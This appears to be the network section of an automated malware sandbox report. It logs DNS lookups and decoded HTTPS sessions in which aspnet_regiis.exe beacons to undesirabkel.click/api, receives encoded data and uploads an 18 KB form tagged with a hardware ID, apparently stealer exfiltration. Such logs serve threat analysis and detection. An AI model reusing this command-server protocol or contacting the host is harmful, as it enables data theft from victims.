                                                                                            Jan 4, 2025 09:42:13.795975924 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.796019077 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.796045065 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265414000 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265471935 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265505075 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265523911 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265568018 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.265569925 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265590906 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.265710115 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.265930891 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.266463041 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.266519070 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.266526937 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270302057 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270329952 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270395994 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.270396948 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270402908 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270463943 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270483971 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.270608902 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.270819902 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.270836115 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:14.270847082 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:14.270852089 CET44349745188.114.96.3192.168.2.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 4, 2025 09:41:59.845680952 CET4948153192.168.2.41.1.1.1
                                                                                            Jan 4, 2025 09:41:59.859971046 CET53494811.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 4, 2025 09:41:59.845680952 CET192.168.2.41.1.1.10x8dacStandard query (0)undesirabkel.clickA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 4, 2025 09:41:59.859971046 CET1.1.1.1192.168.2.40x8dacNo error (0)undesirabkel.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Jan 4, 2025 09:41:59.859971046 CET1.1.1.1192.168.2.40x8dacNo error (0)undesirabkel.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                            • undesirabkel.click
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449736188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:00 UTC265OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
                                                                                            2025-01-04 08:42:00 UTC1129INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:00 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=f7snmd5rb2fm859hho92uous23; expires=Wed, 30 Apr 2025 02:28:39 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJiaUEYX80BvGkCIKIsUU4E2WGf2PxZBpLWAjQL1upm9XZWd5nKKMwv1Qw9AITWXMpzNPcnb0QxWlvtrhYtnpJ2rO3CyIO%2B9r4Sxn7O%2B%2BQ978XyEwUOw%2FGfkJWcHIyMGZ8NIMYs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9eec9a80242b8-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2424&min_rtt=2414&rtt_var=926&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1168935&cwnd=232&unsent_bytes=0&cid=d4cd9a0e646ab335&ts=621&x=0"
                                                                                            2025-01-04 08:42:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                            Data Ascii: 2ok
                                                                                            2025-01-04 08:42:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449738188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:01 UTC266OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 54
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:01 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--iicrrifofhfg&j=
                                                                                            2025-01-04 08:42:02 UTC1121INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:02 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=v1hfetahhpgousqml528ca5nfd; expires=Wed, 30 Apr 2025 02:28:40 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWcCYk2lfoGhukATwOyTDfX3Y6DRcT2AC24dmv0Wn3XP9Ua6dZKrfovcxO9IJ5qgkwW5BiJDj1T7i1aUx1yeQH0LwjXpFZArfv5MVKhRG2d9pVujz53RiSx8ompwmYgjiYBDryQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9eecfba9f4367-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1576&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=956&delivery_rate=1764350&cwnd=237&unsent_bytes=0&cid=f37290843c0180f7&ts=881&x=0"
                                                                                            2025-01-04 08:42:02 UTC248INData Raw: 63 35 30 0d 0a 73 65 42 45 4c 61 63 5a 41 51 71 53 62 6d 49 6b 55 53 56 35 4d 6c 76 6d 55 73 38 37 33 64 2f 67 52 51 65 48 2f 47 71 6c 62 59 33 4b 77 6a 49 50 6e 53 30 74 4b 4f 45 4c 51 42 34 6c 56 77 78 58 64 38 51 7a 71 78 6e 6e 75 59 45 70 64 4f 4c 51 53 4e 4d 41 72 34 75 47 4a 55 48 55 66 43 30 6f 39 78 5a 41 48 67 70 65 57 31 63 31 78 47 6a 74 58 72 65 39 67 53 6c 6c 35 70 63 46 31 51 48 75 32 59 77 6a 52 63 4a 36 5a 57 76 2b 41 77 64 42 4e 45 51 54 58 44 4b 4c 4f 71 49 5a 38 66 32 46 50 79 57 39 33 69 66 41 47 65 7a 38 67 54 64 47 68 57 51 74 63 62 41 4c 44 41 5a 72 42 78 68 58 4f 59 6f 30 71 31 43 31 74 34 67 68 5a 4f 4f 57 47 73 77 4c 35 64 6d 43 49 45 54 49 63 33 46 6d 39 41 51 4d 52 7a 35 45 57 78 35 35 67 79 6a 74 41 66 2f
                                                                                            Data Ascii: c50seBELacZAQqSbmIkUSV5MlvmUs873d/gRQeH/GqlbY3KwjIPnS0tKOELQB4lVwxXd8QzqxnnuYEpdOLQSNMAr4uGJUHUfC0o9xZAHgpeW1c1xGjtXre9gSll5pcF1QHu2YwjRcJ6ZWv+AwdBNEQTXDKLOqIZ8f2FPyW93ifAGez8gTdGhWQtcbALDAZrBxhXOYo0q1C1t4ghZOOWGswL5dmCIETIc3Fm9AQMRz5EWx55gyjtAf/
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 75 73 43 52 30 39 49 73 46 31 77 6d 76 7a 4d 77 2f 44 38 4a 33 49 7a 43 77 42 41 78 49 4e 6b 51 55 56 7a 69 45 49 71 4a 5a 76 4c 57 4b 49 32 2f 71 6b 51 66 4a 42 65 6a 62 69 79 46 41 77 6e 4e 6c 5a 2f 4e 4d 54 67 59 30 58 31 73 49 65 61 51 67 72 6c 71 72 73 4a 4e 6e 65 71 75 48 53 4d 41 44 72 34 76 43 49 45 48 45 64 6d 4e 36 2b 41 63 4c 51 79 46 4d 45 6c 30 30 68 44 32 6e 56 72 79 39 68 53 31 76 36 70 51 4d 79 67 4c 70 30 34 4a 6d 41 59 56 38 65 79 69 6f 54 43 4e 44 49 30 41 58 52 6e 75 2b 63 4c 49 58 70 76 32 46 4b 79 57 39 33 67 44 43 44 4f 7a 59 6a 53 56 48 7a 6d 6c 6a 65 76 59 42 42 56 51 31 51 68 56 61 4f 70 59 36 6f 31 2b 38 74 49 6b 75 59 4f 4b 61 53 49 6c 50 36 4d 76 43 66 67 2f 6b 64 6d 68 6b 2b 68 73 41 42 69 77 4a 41 68 41 2b 69 48 44 31 47 62
                                                                                            Data Ascii: usCR09IsF1wmvzMw/D8J3IzCwBAxINkQUVziEIqJZvLWKI2/qkQfJBejbiyFAwnNlZ/NMTgY0X1sIeaQgrlqrsJNnequHSMADr4vCIEHEdmN6+AcLQyFMEl00hD2nVry9hS1v6pQMygLp04JmAYV8eyioTCNDI0AXRnu+cLIXpv2FKyW93gDCDOzYjSVHzmljevYBBVQ1QhVaOpY6o1+8tIkuYOKaSIlP6MvCfg/kdmhk+hsABiwJAhA+iHD1Gb
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 4b 36 57 5a 45 49 64 58 72 2f 6d 42 4d 6b 7a 50 4f 56 5a 72 2f 67 49 48 55 48 4e 59 56 55 6c 35 67 7a 7a 74 41 66 2b 77 67 79 39 6a 39 35 45 46 78 41 48 68 33 49 63 70 52 38 56 37 62 6d 33 30 42 77 74 46 50 6b 4d 4a 57 6a 6d 4d 4e 61 78 54 74 66 33 4d 5a 32 4c 39 33 6c 43 48 50 76 6a 59 77 42 4e 4d 79 33 56 6b 66 72 41 54 54 6c 39 7a 51 42 63 51 59 63 51 39 70 56 79 36 73 6f 4d 74 61 2b 43 55 42 4d 38 42 37 4d 47 4e 49 6b 2f 4a 63 32 6c 6c 2f 67 67 49 54 7a 68 4d 48 56 41 34 6a 6e 44 6a 47 62 69 6c 77 6e 38 6c 30 5a 6b 45 79 67 43 74 35 6f 45 6f 51 63 4a 74 49 33 65 2b 46 55 42 42 50 77 64 44 45 44 57 4e 4d 4b 5a 54 75 37 32 46 4b 6d 44 6d 6d 51 76 4b 43 4f 58 64 68 53 4a 44 7a 48 5a 6c 61 50 63 49 42 56 51 32 54 68 64 63 65 63 70 77 71 6b 48 2f 35 63 49
                                                                                            Data Ascii: K6WZEIdXr/mBMkzPOVZr/gIHUHNYVUl5gzztAf+wgy9j95EFxAHh3IcpR8V7bm30BwtFPkMJWjmMNaxTtf3MZ2L93lCHPvjYwBNMy3VkfrATTl9zQBcQYcQ9pVy6soMta+CUBM8B7MGNIk/Jc2ll/ggITzhMHVA4jnDjGbilwn8l0ZkEygCt5oEoQcJtI3e+FUBBPwdDEDWNMKZTu72FKmDmmQvKCOXdhSJDzHZlaPcIBVQ2ThdcecpwqkH/5cI
                                                                                            2025-01-04 08:42:02 UTC173INData Raw: 6c 43 48 42 75 62 42 6a 43 68 47 79 48 31 72 62 2f 34 42 43 30 41 34 51 42 78 57 4e 49 77 39 71 46 71 2b 75 59 67 31 5a 75 36 55 42 63 31 50 6f 5a 4f 46 50 67 2b 64 4f 30 52 6b 32 52 77 62 56 43 55 48 42 42 34 67 78 44 65 68 47 65 66 39 67 53 68 73 36 70 59 41 79 41 44 72 33 59 51 67 51 73 42 30 61 58 72 34 41 67 31 4e 50 45 77 4a 55 44 53 41 50 4b 6c 52 74 4c 66 43 61 53 58 69 68 6b 69 66 54 39 72 65 6a 53 5a 4d 30 7a 74 38 4a 75 6c 4d 42 30 70 7a 48 31 74 63 4e 34 51 2f 6f 56 57 30 74 59 4d 72 61 2b 4b 62 0d 0a
                                                                                            Data Ascii: lCHBubBjChGyH1rb/4BC0A4QBxWNIw9qFq+uYg1Zu6UBc1PoZOFPg+dO0Rk2RwbVCUHBB4gxDehGef9gShs6pYAyADr3YQgQsB0aXr4Ag1NPEwJUDSAPKlRtLfCaSXihkifT9rejSZM0zt8JulMB0pzH1tcN4Q/oVW0tYMra+Kb
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 33 64 34 34 0d 0a 41 63 38 48 2f 64 4b 47 4c 6b 37 4c 64 47 4a 73 39 51 6b 45 51 54 64 42 46 42 42 33 78 44 65 31 47 65 66 39 72 51 42 51 70 37 38 79 68 78 43 68 79 73 49 68 51 34 55 6a 49 32 54 7a 41 41 68 4a 4e 55 34 58 57 6a 43 50 50 4b 5a 64 73 37 53 48 49 57 54 67 6d 77 6e 44 41 2b 58 56 67 53 56 41 79 6e 52 72 4b 4c 35 4d 42 31 35 7a 48 31 74 31 4c 6f 38 2b 71 78 6d 67 38 35 74 6e 59 75 6e 65 55 49 63 44 35 74 57 45 49 30 50 45 66 57 74 74 2b 41 67 42 51 44 56 45 46 46 51 38 68 54 2b 70 56 62 47 33 67 79 5a 70 37 70 45 44 77 6b 2b 68 6b 34 55 2b 44 35 30 37 55 6d 76 6d 47 78 42 4b 63 31 68 56 53 58 6d 44 50 4f 30 42 2f 37 79 51 4c 57 2f 72 6d 77 66 43 44 4f 44 55 6a 79 42 44 7a 33 4a 72 62 76 38 46 45 6b 55 2f 53 52 78 65 4e 59 6f 39 70 31 71 79 2f
                                                                                            Data Ascii: 3d44Ac8H/dKGLk7LdGJs9QkEQTdBFBB3xDe1Gef9rQBQp78yhxChysIhQ4UjI2TzAAhJNU4XWjCPPKZds7SHIWTgmwnDA+XVgSVAynRrKL5MB15zH1t1Lo8+qxmg85tnYuneUIcD5tWEI0PEfWtt+AgBQDVEFFQ8hT+pVbG3gyZp7pEDwk+hk4U+D507UmvmGxBKc1hVSXmDPO0B/7yQLW/rmwfCDODUjyBDz3Jrbv8FEkU/SRxeNYo9p1qy/
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 76 6d 51 2f 4d 42 2b 54 63 68 44 52 44 79 32 6c 6d 65 75 4a 4d 54 67 59 30 58 31 73 49 65 62 49 33 76 55 6d 38 2f 37 4d 78 5a 76 4f 56 42 63 74 50 38 4a 32 62 5a 6b 6a 4a 4f 7a 73 6f 39 67 4d 4a 52 54 78 47 45 6c 77 30 67 54 6d 6f 57 4c 6d 35 69 43 31 6c 34 35 67 4a 77 67 58 73 30 6f 67 76 53 4d 31 38 59 48 71 77 51 6b 42 42 4b 77 64 44 45 42 43 44 49 71 4e 4a 2f 36 4c 4d 50 69 58 69 6b 6b 69 66 54 2b 76 5a 6a 53 4a 49 79 58 31 6d 62 76 30 4e 44 30 63 7a 53 42 39 62 4d 49 49 78 6f 46 79 79 75 5a 41 74 62 75 71 53 41 63 73 43 72 35 33 43 49 56 65 46 49 79 4e 5a 2f 51 49 4f 51 53 55 48 42 42 34 67 78 44 65 68 47 65 66 39 67 79 74 71 35 70 45 4c 78 41 37 6c 77 5a 41 71 52 73 31 2b 62 32 50 2b 43 68 4a 41 50 45 34 59 55 7a 43 44 4f 4b 46 54 76 4c 72 43 61 53
                                                                                            Data Ascii: vmQ/MB+TchDRDy2lmeuJMTgY0X1sIebI3vUm8/7MxZvOVBctP8J2bZkjJOzso9gMJRTxGElw0gTmoWLm5iC1l45gJwgXs0ogvSM18YHqwQkBBKwdDEBCDIqNJ/6LMPiXikkifT+vZjSJIyX1mbv0ND0czSB9bMIIxoFyyuZAtbuqSAcsCr53CIVeFIyNZ/QIOQSUHBB4gxDehGef9gytq5pELxA7lwZAqRs1+b2P+ChJAPE4YUzCDOKFTvLrCaS
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 30 41 6a 77 6e 5a 74 6d 53 4d 6b 37 4f 79 6a 32 42 51 5a 42 4e 55 6b 4a 56 54 2b 4c 50 36 52 51 75 37 57 42 4a 32 48 68 6d 51 33 45 41 2b 54 55 67 53 6c 4c 7a 48 56 71 5a 37 42 43 51 45 45 72 42 30 4d 51 47 4a 38 7a 6f 56 54 2f 6f 73 77 2b 4a 65 4b 53 53 4a 39 50 34 39 32 48 4a 6b 58 44 66 32 5a 75 2b 67 6b 41 54 54 42 49 48 31 59 39 69 7a 43 6d 55 4c 36 37 68 79 31 75 34 35 4d 4c 77 51 6d 76 6e 63 49 68 56 34 55 6a 49 30 6a 72 41 51 78 42 63 31 68 56 53 58 6d 44 50 4f 30 42 2f 37 61 4f 49 32 4c 6c 6b 77 76 50 43 75 76 5a 68 79 5a 48 31 33 4e 6a 62 2b 49 65 41 45 38 32 53 78 68 51 50 59 49 35 71 31 71 37 2f 63 78 6e 59 76 33 65 55 49 63 69 34 39 53 72 49 56 53 46 5a 43 31 78 73 41 73 4d 42 6d 73 48 47 6c 73 7a 69 7a 32 75 58 37 79 32 68 79 31 6b 34 70 59
                                                                                            Data Ascii: 0AjwnZtmSMk7Oyj2BQZBNUkJVT+LP6RQu7WBJ2HhmQ3EA+TUgSlLzHVqZ7BCQEErB0MQGJ8zoVT/osw+JeKSSJ9P492HJkXDf2Zu+gkATTBIH1Y9izCmUL67hy1u45MLwQmvncIhV4UjI0jrAQxBc1hVSXmDPO0B/7aOI2LlkwvPCuvZhyZH13Njb+IeAE82SxhQPYI5q1q7/cxnYv3eUIci49SrIVSFZC1xsAsMBmsHGlsziz2uX7y2hy1k4pY
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 34 48 4d 5a 6c 32 46 49 79 4d 76 38 78 34 53 51 44 42 52 47 42 63 48 75 68 65 37 55 37 69 74 68 54 42 71 70 64 42 49 79 45 2b 33 36 73 49 76 53 4e 35 71 64 57 58 67 43 30 42 35 66 51 63 44 45 47 48 45 42 61 35 58 73 62 71 55 4e 69 6a 43 69 41 4c 41 48 2b 6a 45 6a 57 59 42 68 58 30 6a 4d 4b 4e 43 51 45 49 69 42 30 4d 41 61 39 39 6c 2f 67 37 76 37 35 31 70 66 4b 57 49 53 4a 39 64 6f 5a 4f 51 5a 68 65 46 50 47 42 36 34 67 6f 44 55 44 41 41 4a 57 34 65 6e 6a 32 72 54 71 36 44 76 43 42 2f 36 4a 67 66 31 6b 50 36 30 49 77 6f 53 4e 4d 37 4c 53 6a 2f 54 46 68 2f 63 77 39 62 62 33 66 45 4b 4f 30 42 2f 34 69 42 4b 57 76 69 69 42 6d 4b 4b 50 58 65 68 44 46 65 68 54 55 6a 62 72 42 55 55 67 68 7a 51 77 6f 51 59 64 52 69 39 67 7a 73 36 74 4a 31 65 71 75 48 53 4e 46 50
                                                                                            Data Ascii: 4HMZl2FIyMv8x4SQDBRGBcHuhe7U7ithTBqpdBIyE+36sIvSN5qdWXgC0B5fQcDEGHEBa5XsbqUNijCiALAH+jEjWYBhX0jMKNCQEIiB0MAa99l/g7v751pfKWISJ9doZOQZheFPGB64goDUDAAJW4enj2rTq6DvCB/6Jgf1kP60IwoSNM7LSj/TFh/cw9bb3fEKO0B/4iBKWviiBmKKPXehDFehTUjbrBUUghzQwoQYdRi9gzs6tJ1equHSNFP
                                                                                            2025-01-04 08:42:02 UTC1369INData Raw: 5a 58 68 53 4d 6a 58 66 4d 43 44 6b 45 6c 56 6c 5a 34 47 72 34 4b 37 33 57 34 71 4d 41 54 59 76 57 50 41 38 6f 44 72 35 33 43 49 41 2b 64 4b 79 30 6f 39 42 31 41 48 6d 4d 56 51 41 56 71 30 32 44 2f 52 76 47 6b 77 6a 45 6c 76 63 78 47 68 78 32 76 69 38 4a 68 54 4e 64 70 5a 57 76 6d 44 30 64 34 44 57 41 56 56 7a 69 53 49 4c 70 57 67 59 4f 58 4a 47 76 72 6d 52 37 57 54 36 47 54 6a 57 59 58 2f 44 73 72 4b 4d 39 43 51 46 35 7a 48 31 74 6c 4f 6f 6f 2b 71 6b 2b 75 38 4b 55 70 59 75 53 49 47 4e 41 41 72 35 33 43 49 41 2b 64 4b 53 30 6f 39 42 31 41 48 6d 4d 56 51 41 56 71 30 32 44 2f 52 76 47 6b 77 6a 45 6c 76 63 78 47 68 78 32 76 69 38 4a 68 54 4e 64 70 5a 57 76 6d 44 30 64 34 44 57 41 56 56 7a 69 53 49 4c 70 57 38 4a 4f 30 42 6c 76 62 69 77 76 4a 41 65 6a 46 6b
                                                                                            Data Ascii: ZXhSMjXfMCDkElVlZ4Gr4K73W4qMATYvWPA8oDr53CIA+dKy0o9B1AHmMVQAVq02D/RvGkwjElvcxGhx2vi8JhTNdpZWvmD0d4DWAVVziSILpWgYOXJGvrmR7WT6GTjWYX/DsrKM9CQF5zH1tlOoo+qk+u8KUpYuSIGNAAr53CIA+dKS0o9B1AHmMVQAVq02D/RvGkwjElvcxGhx2vi8JhTNdpZWvmD0d4DWAVVziSILpW8JO0BlvbiwvJAejFk


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449740188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:03 UTC274OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=IN8UF5IP
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18110
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:03 UTC15331OUTData Raw: 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                            Data Ascii: --IN8UF5IPContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--IN8UF5IPContent-Disposition: form-data; name="pid"2--IN8UF5IPContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--IN8UF5IPContent-D
                                                                                            2025-01-04 08:42:03 UTC2779OUTData Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
                                                                                            Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                            2025-01-04 08:42:06 UTC1132INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ajohhj47v2i2542v81cdko1a9n; expires=Wed, 30 Apr 2025 02:28:42 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FiNOadCTdoL3EFGiG78Dvk%2B9xzXfqiUBIUcj0YYEswpc3pLSXpwZoZjnUn34IALIfckrcXiMCFBj58wGnooDQJXNEuTGIm7GfI5K6ct8K6M%2BD214uXuNPnM5JDMG1opMD3zUmfk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9eed9dfc143a3-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=603&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19064&delivery_rate=1796923&cwnd=226&unsent_bytes=0&cid=ca1ca5b8ecd9cca0&ts=3109&x=0"
                                                                                            2025-01-04 08:42:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-04 08:42:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449741188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
